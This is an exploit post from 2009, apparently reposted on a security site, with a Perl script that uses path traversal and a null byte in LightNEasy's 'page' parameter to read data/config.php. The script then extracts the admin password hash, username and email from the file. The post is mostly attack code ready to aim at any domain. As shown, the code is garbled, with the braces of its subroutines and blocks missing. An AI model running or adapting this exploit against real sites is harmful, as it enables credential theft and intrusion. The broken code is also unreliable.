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LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit
来源:staker[at]hotmail[dot]it 作者:staker 发布时间:2009-06-11  

# LightNEasy sql/no-db <= 2.2.x system config disclosure exploit
# by staker
# ------------------------------
# mail: staker[at]hotmail[dot]it
# url: http://www.lightneasy.org
# ------------------------------

# it works with magic_quotes_gpc=off
# short explanation:
# -----------------------------------------------------
# LightNEasy contains one flaw that allows an attacker
# to disclose a local file because of file_get_contents
# it's possible to retrieve the configuration file
# passing as argument '../data/config.php'. Example:
# http://[host]/LightNEasy.php?page=../data/config.php
# ----------------------------------------------------
# Today is: 09 June 2009
# Location: Italy,Turin.
# http://www.youtube.com/watch?v=uXN0pE2Hdt8
# ----------------------------------------------------

use IO::Socket;

my $domain = $ARGV[0] || &usage;

launch_cmd("../data/config.php"); # if you wanna disclose another file,change it

sub launch_cmd()
      my ($data,$result,$html);
      my $page = $_[0] || die $!;
      my $path = socket_url($domain,'path');  
      my $host = socket_url($domain,'host');
      my $TCP = IO::Socket::INET->new(
                                       PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp',
                                     ) || die $!;
      $data .= "GET /$path/LightNEasy.php?page=$page%00 HTTP/1.1\r\n";
      $data .= "Host: $host\r\n";
      $data .= "User-Agent: Lynx (textmode)\r\n";
      $data .= "Connection: close\r\n\r\n";
      while (<$TCP>) {
            $html .= $_;
      if ($html =~ /password']="([0-9a-f]{40})"/i) {
            $result .= "Password: $1\n";
      if ($html =~ /fromname']="(.+?)"/i) {
            $result .= "Username: $1\n";
      if ($html =~ /toemail']="(.+?)"/i) {
            $result .= "E-Mail: $1\n";
      print $result;

sub socket_url()
           my ($url,$ext) = @_;
           $url =~ s/http:\/\/// if $url =~ /^http:\/\/(.+?)+$/i;
           @GLOBALS = split /\//,$url;
           if ($ext eq 'host') {
                return $GLOBALS[0];
           elsif ($ext eq 'path') {
                return $GLOBALS[1];
           else {
                return join('/',@GLOBALS);   

sub parse_url
        my $string = shift @_ || die($!);
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        return $string;

sub usage()
       print  "[*------------------------------------------------------------*]\n".
              "[* LightNEasy sql/no-db < 2.2.x sys config disclosure exploit *]\n".
              "[* Usage: perl light.pl [domain]                              *]\n".
              "[* [domain] domain -> http://localhost/lightneasy             *]\n".

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